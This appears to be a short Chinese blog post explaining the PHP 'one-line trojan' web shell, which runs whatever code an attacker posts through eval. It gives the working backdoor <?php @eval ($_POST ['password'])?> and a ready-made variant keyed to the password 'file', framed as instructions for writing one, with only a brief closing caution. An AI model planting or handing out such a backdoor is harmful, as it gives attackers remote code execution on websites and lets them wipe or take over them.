这是一个典型的后门程序,首先我解释一下eval函数的作用,
//eval — 把字符串作为PHP代码执行eval('echo 123')//输出123
也就是说,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST['posha']的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行,这个时候就有点可怕了,比如写入一段循环删除整站代码等等。
PHP一句话木马是一种利用PHP的eval函数执行任意代码的后门程序。一般格式为:<?php @eval ($_POST ['password'])?>
其中,password是连接木马时需要输入的密码,可以自定义。如果您想要写一个密码为file的一句话木马,那么可以这样写:
<?php @eval ($_POST ['file'])?>
请注意,这种木马非常危险,可能导致网站被黑客入侵或破坏,请谨慎使用。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)